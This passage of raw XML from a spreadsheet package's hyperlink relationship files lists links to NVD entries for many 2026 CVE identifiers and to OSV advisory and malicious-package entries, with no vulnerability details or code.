Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98044" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98045" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98046" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98047" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98048" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98049" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98051" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98053" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98054" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98055" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98057" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98058" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98059" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98060" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98061" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98062" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98063" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98064" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98065" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98066" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98067" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98068" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98071" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98072" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98074" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98075" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98076" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98077" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98078" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98079" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98080" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98081" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98082" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98084" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98085" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98086" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98087" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98088" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98089" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98090" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98091" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98092" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98093" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98094" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98095" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98097" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98098" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98099" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98101" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98102" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98103" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98104" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98105" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98106" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98107" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98109" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98110" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98111" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98113" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98114" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98117" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98118" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98119" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98120" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98121" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98123" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98124" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98125" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98126" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98127" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98128" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98129" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98131" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98132" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98133" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98134" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98135" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98136" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98137" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98138" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98139" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98140" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98141" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98142" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98144" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98145" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98146" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98147" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98148" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98149" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98151" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98152" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98153" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98155" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98157" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98158" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98159" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98160" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98161" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98162" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17186" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17181" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17182" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17183" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17184" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17185" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17187" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17188" TargetMode="External" Id="rId782" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88351" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97230" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51994" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92288" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51997" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85491" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88361" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88362" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88373" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88388" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88369" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53493" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88359" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88367" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95811" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97636" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93353" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88386" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97326" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97646" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88370" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97225" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48543" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97320" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97325" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97366" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97368" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97648" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97650" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97649" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57440" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61823" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61825" TargetMode="External" Id="rId33" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87902" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65660" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67279" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87902" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65660" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67279" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100382" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100075" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14281" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92161" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92609" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93643" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48482" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93641" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93642" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93647" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95832" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39353" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42322" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62262" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84458" TargetMode="External" Id="rId15" /><Relationship 